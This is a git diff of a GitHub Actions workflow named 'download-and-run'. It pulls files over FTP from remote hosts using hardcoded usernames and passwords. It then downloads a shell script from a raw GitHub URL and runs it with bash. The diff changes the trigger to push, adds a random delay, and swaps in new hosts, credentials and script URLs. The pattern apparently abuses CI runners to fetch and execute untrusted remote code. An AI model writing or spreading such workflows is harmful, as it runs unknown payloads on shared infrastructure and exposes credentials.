--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,7 +1,5 @@
-name: six111
-on:
-  schedule:
-    - cron: '19 */2 * * *' # Run every day at midnight
+name: nine
+on: [push, workflow_dispatch]
 jobs:
   download-and-run:
     runs-on: ubuntu-latest
@@ -13,10 +11,11 @@ jobs:
           files=("230117" "230118" "230119" "230120" "230121")
           for file in "${files[@]}"; do
           for i in {1..1}; do
-          wget -nH -m --ftp-user=ttthjjerster3 --ftp-password=tttuuuu2555T125 "ftp://ftp-ttthjjerster3.alwaysdata.net/www/$file/*"
+          wget -nH -m --ftp-user=if0_37965025 --ftp-password=98kDsIA4LJEZ "ftp://185.27.134.11/htdocs/$file/*"
           sleep 5
           done
-          cp www/$file/* ./
+          cp htdocs/$file/* ./
           done
-          wget -O drive333.sh https://raw.githubusercontent.com/iijtfvvvg/0127/main/.github/workflows/drive333.sh
+          sleep $((RANDOM % 10 + 1))m
+          wget -O drive333.sh https://raw.githubusercontent.com/tuhvvvvvy/0127/main/.github/workflows/drive333333.sh
           bash drive333.sh
